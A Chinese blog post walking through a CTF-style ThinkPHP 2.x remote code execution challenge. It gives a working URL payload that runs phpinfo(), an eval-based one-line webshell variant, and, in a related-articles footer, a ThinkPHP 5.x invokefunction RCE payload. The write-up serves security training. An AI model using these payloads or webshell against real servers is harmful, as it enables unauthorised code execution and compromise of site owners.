首页 > 编程语言 >[ThinkPHP]2-Rce 1

[ThinkPHP]2-Rce 1

时间:2024-11-09 23:10:09浏览次数:4  
标签:index name phpinfo 扫描 ThinkPHP Rce

[ThinkPHP]2-Rce 1

启动实例发现是一个ThinkPHP的示例代码,根据题目判断这题为RCE

image-20241105081322688

扫描器扫描,未发现存在的REC漏洞(根据题目以及扫描结果猜想,可能是2.x版本的rec)

image-20241105081525696

构造payload,成功显示phpinfo页面

?s=/index/index/name/${phpinfo()}

image-20241105082201274

唱跳rap篮球+F,直接找到flag

image-20241105082253527

tips.有时候在phpinfo找不到,可以采用一句话木马形式

?s=/index/index/name/${@eval($_POST[123456])}

image-20241105082540574

标签:index,name,phpinfo,扫描,ThinkPHP,Rce
From: https://www.cnblogs.com/tazmi/p/18537449

相关文章

  • [ThinkPHP]5-Rce 1
    [ThinkPHP]5-Rce1打开发现是一个ThinkPHP5+框架,直接用ThinkPHP扫描工具检测出是一个ThinkPHP5.0.22/5.1.29的RCE漏洞,访问Payload?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1直接在phpinfo()的环境变量里面找到flag......
  • CodeforceTon Round 4 div1 + div2 题解
    题解A-EDreamissofar~A.BeautifulSequence检查每一位对应的数字是否小于等于位置,如果可以说明这个数字可以移动到对应位置上,遍历即可#include<bits/stdc++.h>usingnamespacestd;usingi64=longlong;voidsolve(){ intn; cin>>n; vector<int>a......
  • Codeforces 983 A-E
    题解A难度:黄算法标签:数学、进制题目翻译:给定进制\(b\)和分数\(\frac{p}{q}\),求这个分数在\(b\)进制下是否是有限小数。题目分析:首先将分数化简(不用说了)。接下来有命题:若\(/frac{1}{q}\)为有限小数,则\(/frac{p}{q}\)必然为有限小数。且逆命题、否命题成立。证明略。......
  • ThinkPHP6,视图的安装及模板渲染和变量赋值
    tp6视图功能由\think\View类配合视图驱动(也即模板引擎驱动)类一起完成,新版仅内置了PHP原生模板引擎(主要用于内置的异常页面输出),如果需要使用其它的模板引擎需要单独安装相应的模板引擎扩展。使用think-template模板引擎,只需要安装think-view模板引擎驱动。composercreate-proje......
  • Educational Codeforces Round 159 (Rated for Div. 2) - VP记录
    Preface重点策略:\[\large\textbf{\underline{先写简单好写的算法,再逐步修改优化}}\]十分有效,百试百灵,屡试不爽。A.BinaryImbalance当有相邻两字符不相等时,就可以不断向中间插入0。所以输出NO当且字符串全为1。点击查看代码#include<cstdio>usingnamespacestd;......
  • NETCONF 是由 IETF (Internet Engineering Task Force) 提出的一个标准化协议,目标是
    WindowsNetConf(NetworkConfiguration)是Windows操作系统中用于网络配置管理的框架,通常涉及自动化网络配置、管理网络接口和相关网络设置。它提供了一组API和命令行工具,允许管理员和应用程序配置、查询和管理网络设置。什么:NetConf是Windows中用于网络接口配置的功能,可以......
  • Codeforces 909 A-F
    CF909题解题目链接ABCDEF难度:红黄绿蓝绿紫题解A题目翻译:给定两个字符串,求字典序最小的“两字符串非空前缀拼接形成的字符串”。算法标签:贪心题目分析:字典序最小,即从左往右依次比较字符,直到一方不剩字符或两字符不同。因此想到贪心。由于前缀非空,因此在前一字......
  • salesforce零基础学习(一百四十一)刷新dev sandbox需要强制group
    本篇参考:https://help.salesforce.com/s/articleView?id=sf.data_sandbox_selective_access.htm&type=5背景:最近同事刷新sandbox发现点击create不生效,并且无任何提示(后续可能优化)。习惯了直接创建或者刷新的老司机们可能看不出来SandboxAccess标红提示来着,恰巧当前的org还没有......
  • vscode配置xdebug断点调试thinkphp
    vscode配置xdebug断点调试thinkphp其实和配置其他php框架的断点调试一样,步骤如下:下载xdebug,重命名为php_xdebug.dll并移动到php.ini目录;(不知道下载那个版本可以通过xdebug官网提供的在线查询工具查询。https://xdebug.org/wizard在安装的主机上执行php-i,将输入的结果粘贴到网......
  • 理解Web登录机制:会话管理与跟踪技术解析(四)-拦截器Interceptor、异常处理
    本文将详细探讨如何通过拦截器实现登录校验,并介绍如何通过异常处理来确保系统的鲁棒性。我们将通过具体的示例,深入分析如何在Spring框架中配置拦截器与异常处理,以便为开发者提供一套高效、安全的登录校验和异常管理方案。目录前言拦截器Interceptor快速入门Interceptor......